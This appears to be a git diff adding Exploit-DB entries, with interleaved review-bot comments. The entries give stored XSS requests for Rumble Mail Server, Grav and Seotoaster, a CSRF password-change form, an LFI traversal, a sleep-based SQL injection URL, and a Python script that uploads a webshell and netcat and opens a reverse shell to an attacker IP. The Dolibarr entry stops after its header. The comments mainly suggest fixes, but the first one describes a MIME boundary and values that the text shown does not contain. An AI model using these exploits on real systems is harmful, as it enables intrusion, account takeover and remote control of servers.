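Review bot: The file still carries mail-transport residue: the last line `--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--` is a MIME boundary. The trailing `=` in the `# Google Dork:` line and the split `x=` / `86_64` in the `php_uname` value look like quoted-printable soft line breaks. Remove the boundary line and rejoin the wrapped value so the sample output reads `x86_64`. The write-up would also serve site owners better with a closing line naming the two files to restrict, `cli/env-info.php` and `cron/restore-info.json`, and the release that fixes them (`<fixed version>`, not given on the page).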
diff --git a/exploits/multiple/webapps/49253.txt b/exploits/multiple/webapps/49253.txt
new file mode 100644
index 000000000..a2bbed8f8
--- /dev/null
+++ b/exploits/multiple/webapps/49253.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /settings:save HTTP/1.1
+Host: 127.0.0.1:2580
+Connection: keep-alive
+Content-Length: 343
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1:2580
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1:2580/settings
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+
+save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
+HTTP/1.1 302 Moved
+Location: /settings:save
+
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on <script>alert(xss.com)</script><br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h1>Server settings</h1>
+
+Saving config/rumble.conf
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
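Review bot: The request carries `Authorization: Basic YWRtaW46YWRtaW4=`, which decodes to `admin:admin`, so this stored XSS appears to need an authenticated RumbleLua administrator, yet neither the title nor the header says so. The same applies to 49254.txt and to the visible start of 49255.txt. Add a header line such as `# Privileges required: authenticated admin (default credentials in the sample)` so the finding is rated correctly. The response excerpt also shows `alert(xss.com)` where the request sent `alert("xss.com")`; say whether the server strips the quotes or the excerpt was edited. A blank line between the request body and the `HTTP/1.1 302 Moved` response would make the boundary clear.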
diff --git a/exploits/multiple/webapps/49254.txt b/exploits/multiple/webapps/49254.txt
new file mode 100644
index 000000000..c94a10cea
--- /dev/null
+++ b/exploits/multiple/webapps/49254.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Info
+The parameters `domain` and `path` are vulnerable to stored XSS.
+
+# Exploit:
+POST /domains HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
+Upgrade-Insecure-Requests: 1
+
+domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h2>Domains</h2>
+<p>
+  <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
+			<div>
+			<div >
+				<div class='form_key'>
+					Domain name:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="domain"/>
+				</div>
+			</div>
+
+			<div>
+				<div class='form_key'>
+					Optional alt. storage path:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="path"/>
+				</div>
+			</div>
+
+
+			<div class='form_el' id='domainsave' >
+				<div class='form_key'>
+						<input type="hidden" name="create" value="true"/>
+					<input class="button" type="submit" value="Save domain"/>
+					<input class="button"  type="reset" value="Reset"/>
+				</div>
+			</div>
+			<br/><br/><br/><br/><br />
+			</div>
+			</form>
+			</td></tr></table></p>
+<p>&nbsp;</p>
+<table class="elements" border='0' cellpadding='5' cellspacing='1'>
+  <tr><th>Domain</th><th>Actions</th></tr>
+<tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49255.txt b/exploits/multiple/webapps/49255.txt
new file mode 100644
index 000000000..50b5847d1
--- /dev/null
+++ b/exploits/multiple/webapps/49255.txt
@@ -0,0 +1,146 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /users HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/users
+Upgrade-Insecure-Requests: 1
+
+username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a.com<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+
+
+<h1>RumbleLua users </h1>
+<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
+Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
+while regular users can only
+see and edit the domains they have access to.
+</p>
+<table class="elements">
+  <tr>
+    <th>Create a new user:</th>
+  </tr>
+<tr>
+<td>
+<form action="/users" method="post" name="makeuser">
+
+  <div style="width: 300px; text-align:right; float: left;">
+    <label for="username"><strong>Username:</strong></label>
+    <input name="username" autocomplete="off" type="text" id="username" >
+    <br>
+    <label for="password"><strong>Password:</strong></label>
+    <input type="password" autocomplete="off" name="password" id="password">
+    <br />
+    <label for="password"><strong>Access rights:</strong></label>
+    <select name="rights" size="4" style="width: 150px;" multiple="multiple">
+    <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
+    <optgroup label="Domains:">
+        </optgroup>
+    </select>
+      </div>
+    <p><br /><br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+
+      &nbsp;&nbsp;
+      <input type="submit" name="submit" id="submit" value="Submit" />
+    </p>
+
+</form>
+</td>
+</tr>
+</table>
+<table width="200" class="elements">
+  <tr>
+    <th>Username</th>
+    <th>Rights</th>
+    <th>Actions</th>
+  </tr>
+  <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+  </table>
+<p>&nbsp;</p>
+
+
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
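Review bot: The entry stops at the raw capture and never names the sink: in the response, the stored `username` is written unescaped into the table cell and into the `href` of the Edit and Delete links in the "Username / Rights / Actions" table. A line after `# Exploit:` such as `# Root cause: username is echoed into HTML text and attribute contexts without output encoding; fix: HTML-encode on output and URL-encode inside href` would make the entry usable for remediation. The request carries an `Authorization: Basic` header, so the header block should also say that an authenticated RumbleLua user is required, which bounds the impact. The third table row shows `alert("M5072")` in the cell but `alert("XSS")` in its links, so the capture appears to mix more than one test and is worth re-taking.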
diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt
index 06ea8299c..ed29dab88 100644
--- a/exploits/php/webapps/49209.txt
+++ b/exploits/php/webapps/49209.txt
@@ -5,6 +5,7 @@
 # Tested on: Windows 10
 # Web Browser: Mozilla Firefox & Opera
 # Google Dorks: "Powered by vBulletin® Version 5.6.3"
+# Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html
 
 Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
 Choose "Denim" or other theme and choose action "Add new template" and
diff --git a/exploits/php/webapps/49245.txt b/exploits/php/webapps/49245.txt
new file mode 100644
index 000000000..b67419f9e
--- /dev/null
+++ b/exploits/php/webapps/49245.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change 
+password)
+# Date: 2020-12-14
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://www.rukovoditel.net/download.php
+# Version: v2.6.1
+# Tested on: Kali Linux
+
+POC(localhost/index.php?module=users/change_password):
+
+<html>
+   <!-- CSRF PoC  -->
+   <body>
+   <script>history.pushState('', '', '/')</script>
+     <form 
+action="https://localhost/index.php?module=users/change_password&action=change" 
+method="POST">
+       <input type="hidden" name="form&#95;session&#95;token" 
+value="D&#94;HUyTDh0X" />
+       <input type="hidden" name="password&#95;new" value="123456789" />
+       <input type="hidden" name="password&#95;confirmation" 
+value="123456789" />
+       <input type="submit" value="Submit request" />
+     </form>
+   </body>
+</html>
+
+
+--
\ No newline at end of file
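Review bot: The PoC form posts a hard-coded `form_session_token` value, but the text never says whether the server checks it, so a reader cannot tell whether the flaw is a missing check, a token not bound to the session, or something else. A header line such as `# Root cause: change_password accepts the request without validating form_session_token against the session (TODO confirm)` would close that gap. The form sends only `password_new` and `password_confirmation`, which suggests the current password is not required; the entry should name both a per-session token check and re-entry of the current password as the fix. The title is also wrapped across two lines (`(Change` / `password)`), which breaks tools that read `# Exploit Title:` as a single line.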
diff --git a/exploits/php/webapps/49258.txt b/exploits/php/webapps/49258.txt
new file mode 100644
index 000000000..e61a6f1c1
--- /dev/null
+++ b/exploits/php/webapps/49258.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
+# Exploit Author: İsmail BOZKURT
+# Date: 2020-12-15
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Windows 10 x86_64
+
+Step 1. Log into application with credentials
+Step 2. Click on Branch
+Step 3. Select New Branch http://127.0.0.1/index.php?page=index
+Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00
+
+Note: php version < 5.3.3
+
+section class="content">
+    <div class="container-fluid">
+    <?php 
+    	$page = isset($_GET['page']) ? $_GET['page'] : 'home';
+	    if(!file_exists($page.".php")){
+	    include '404.html';
+	    }else{
+	    include $page.'.php';
+    }
+    ?>
\ No newline at end of file
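Review bot: The `Note: php version < 5.3.3` line understates the exposure in the quoted code: `include $page.'.php'` takes `$_GET['page']` verbatim, so the version limit presumably applies only to the `%00` truncation, while the unvalidated include itself does not depend on the PHP version. The entry should state the fix, which is to map `page` onto a fixed list of names instead of a path, for example `$allowed = ['home' /* , other page names */];` followed by `if (!in_array($page, $allowed, true)) { include '404.html'; } else { include $page.'.php'; }`. The quoted snippet is cut at both ends (`section class="content">` lacks its `<` and the closing tags are missing), so it should be marked as an excerpt.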
diff --git a/exploits/php/webapps/49260.py b/exploits/php/webapps/49260.py
new file mode 100755
index 000000000..1d2d8b55c
--- /dev/null
+++ b/exploits/php/webapps/49260.py
@@ -0,0 +1,128 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-14-12
+# Exploit Author: Andrea Bruschi - www.andreabruschi.net
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 / Xampp Server and Wamp Server
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import os
+import iterm2
+import AppKit
+
+url = sys.argv[1]
+mobile = sys.argv[2]
+password = sys.argv[3] 
+
+# CONFIGURE HERE
+reverse_ip = '192.168.xx.xx'
+reverse_port = 4444
+
+# CONFIGURE HERE
+# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
+netcat_path = '/local/path/to/nc.exe'
+shell_path = '/local/path/to/shell.php'
+
+
+def login(url, mobile, password):
+
+    url = "{}/user/login.php".format(url)
+    payload = {'mobno':mobile, 'password':password, 'login':''}
+    req = requests.post(url, data=payload)
+    cookie = req.cookies['PHPSESSID']
+    
+    return cookie
+
+
+def upload(url, cookie, file=None):
+
+    f = open(file, 'rb')
+    filename, ext = os.path.splitext(file)
+
+    if "exe" in ext:
+        content_type = 'application/octet-stream'
+    else:
+        content_type = 'application/x-php'
+
+    cookie = {'PHPSESSID':cookie}
+    url = "{}/user/marriage-reg-form.php".format(url)
+
+    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
+    req = requests.post(url, data=payload, cookies=cookie, files=files)
+    print(f'[+] File {ext} uploaded')
+
+
+def get_remote_file(url, ext):
+
+    url = "{}/user/images".format(url)
+    req = requests.get(url)
+    junk = req.text.split(ext)[0]
+    f = junk[-42:] + ext
+    
+    return f
+
+
+def persistence(url, webshell, netcat):
+
+    # webshell
+    payload_w = "copy /y {} shell.php".format(webshell)
+    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
+    req_w = requests.get(url_w)
+    
+    # netcat
+    payload_n = "copy /y {} nc.exe".format(netcat)
+    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
+    req_n= requests.get(url_n)
+
+    print('[+] Persistence enabled')
+
+
+def get_reverse(url, ip, port):
+
+    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
+    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
+    print('[+] Reverse shell incoming!')
+    req = requests.get(url_r)
+
+
+# CONFIGURE HERE
+# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
+# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
+def start_listener(port):
+    
+    # Launch the app
+    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
+
+    async def main(connection):
+        app = await iterm2.async_get_app(connection)
+        window = app.current_window
+        if window is not None:
+            cmd = "nc -lnv {}".format(port)
+            await window.async_create_tab(command=cmd)
+        else:
+            print("No current window")
+
+    iterm2.run_until_complete(main)
+
+
+
+if __name__ == "__main__":
+
+    if len(sys.argv < 3): 
+        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
+    else:
+        cookie = login(url, mobile, password)
+        upload(url, cookie, netcat_path)
+        upload(url, cookie, shell_path)
+        webshell = get_remote_file(url, '.php')
+        netcat = get_remote_file(url, '.exe')
+        persistence(url, webshell, netcat)
+        
+        start_listener(reverse_port)
+        get_reverse(url, reverse_ip, reverse_port)
\ No newline at end of file
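Review bot: The header has no description of the flaw the script depends on, which is visible only by reading `upload()`: the `husimage` field of `/user/marriage-reg-form.php` is sent a file with an `.exe` or `.php` extension and an arbitrary content type, and the stored file is then requested under `/user/images/`. A comment block after the header should say so and name the remediation: accept only image types verified server-side, store uploads outside the web root under a server-chosen name, and disable script execution in the upload directory. For detection, the requests the script makes are distinctive: GETs to `/user/images/*.php` carrying a `cmd=` parameter. The `# Date: 2020-14-12` header is not a valid `YYYY-MM-DD` date and should follow the format the other entries in this commit use.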
diff --git a/exploits/php/webapps/49264.txt b/exploits/php/webapps/49264.txt
new file mode 100644
index 000000000..1fdab4c98
--- /dev/null
+++ b/exploits/php/webapps/49264.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
+# Date: 13-12-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://getgrav.org/
+# Software Link: https://getgrav.org/downloads
+# Version: Grav v1.6.30 - Admin v1.9.18
+# Tested on: Windows 10/Kali Linux
+# Contact: https://www.linkedin.com/in/sagarbanwa/
+
+Step to reproduce :
+
+1) log in to the grav-admin panel 
+2) Go to Pages 
+3) Click on Add 
+4) It will ask to Add Page
+5) fill the following details as below 
+   Page Title : <script>alert(1337)</script>
+   Folder Name : sagar_Banwa
+   Parent Page : /(root)
+   Page Template : Default
+   Value : yes
+6) click on the Save button 
+7) now Click on Pages again.
+8) your page name will be listed as <script>alert(1337)</script>
+9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up 
+
+-------------------------------------
+   
+POST /grav-admin/admin/pages HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 230
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/grav-admin/admin/pages
+Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
+Upgrade-Insecure-Requests: 1
+
+data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f
+
+-----------------------------
\ No newline at end of file
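Review bot: The captured request publishes session material that adds nothing to the reproduction: the `Cookie:` header carries `grav-site-a4a23f1-admin` and `grav-site-a4a23f1` values, and the body carries an `admin-nonce`. These should be replaced with placeholders, e.g. `Cookie: grav-site-<id>-admin=<redacted>` and `admin-nonce=<redacted>`. The entry should also state that the request needs an authenticated admin session with a valid nonce, and that the fix is to HTML-encode the page title wherever it is rendered; steps 8 and 9 name both the admin Pages list and the site front page.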
diff --git a/exploits/php/webapps/49267.txt b/exploits/php/webapps/49267.txt
new file mode 100644
index 000000000..afbecfd5e
--- /dev/null
+++ b/exploits/php/webapps/49267.txt
@@ -0,0 +1,14 @@
+​# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
+# Date: 2020-12-15
+# Exploit Author: Frederic ADAM
+# Author contact: contact@fadam.eu
+# Vendor Homepage: https://www.prestashop.com
+# Software Link: https://github.com/PrestaShop/productcomments
+# Version: 4.2.0
+# Tested on: Debian 10
+# CVE : CVE-2020-26248
+
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
+
+Example:
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
\ No newline at end of file
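Review bot: The first header line has an invisible character between the diff marker and `# Exploit Title:`, so anything that parses the header by line prefix will miss the title; the character should be removed. The entry cites CVE-2020-26248 but gives no remediation; a line such as `# Fix: upgrade productcomments to the release named in the CVE advisory` would help, and the underlying correction is presumably to cast each `id_products[]` element to an integer before it reaches the query. The `CommentGrade` controller is addressed through the public `index.php?fc=module` URL, so the header should say whether a customer session is required.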
diff --git a/exploits/php/webapps/49268.txt b/exploits/php/webapps/49268.txt
new file mode 100644
index 000000000..8d1d21095
--- /dev/null
+++ b/exploits/php/webapps/49268.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.seotoaster.com/
+# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/
+# Version: 3.2.0
+# Tested on Windows 10
+
+XSS ATTACK:
+Cross-site Scripting (XSS) is a client-side code injection attack. The
+attacker aims to execute malicious scripts in a web browser of the victim
+by including malicious code in a legitimate web page or web application.
+The actual attack occurs when the victim visits the web page or web
+application that executes the malicious code. The web page or web
+application becomes a vehicle to deliver the malicious script to the user’s
+browser. Vulnerable vehicles that are commonly used for Cross-site
+Scripting attacks are forums, message boards, and web pages that allow
+comments.
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Edit page properties
+
+Steps to reproduce:
+1: Navigate to "https://localhost/" and log in with valid credentials.
+2: Then navigates/click on "Edit page properties".
+3: Add the payload "*"><script>alert(document.cookie)</script>*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully.
+4: Hence XSS will get stored and trigger on the main home/main page.
\ No newline at end of file
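Review bot: `Vulnerable Parameters: Edit page properties` names a dialog, not a parameter; step 3 shows the affected input is the "Page header H1 tag" field, and the title and header should say so. The generic "XSS ATTACK" and "XSS IMPACT" paragraphs could be replaced by the two facts that matter for this entry: the action needs a logged-in user who may edit page properties, and the fix is to encode the H1 value for the HTML context in which the home page renders it.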
diff --git a/exploits/php/webapps/49269.py b/exploits/php/webapps/49269.py
new file mode 100755
index 000000000..41e8c2dff
--- /dev/null
+++ b/exploits/php/webapps/49269.py
@@ -0,0 +1,77 @@
+# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
+# Date: 2020.12.17
+# Exploit Author: Yilmaz Degirmenci
+# Vendor Homepage: https://github.com/Dolibarr/dolibarr
+# Software Link: https://sourceforge.net/projects/dolibarr/
+# Version: 12.0.3
+# Tested on: Kali Linux 2020.2
+
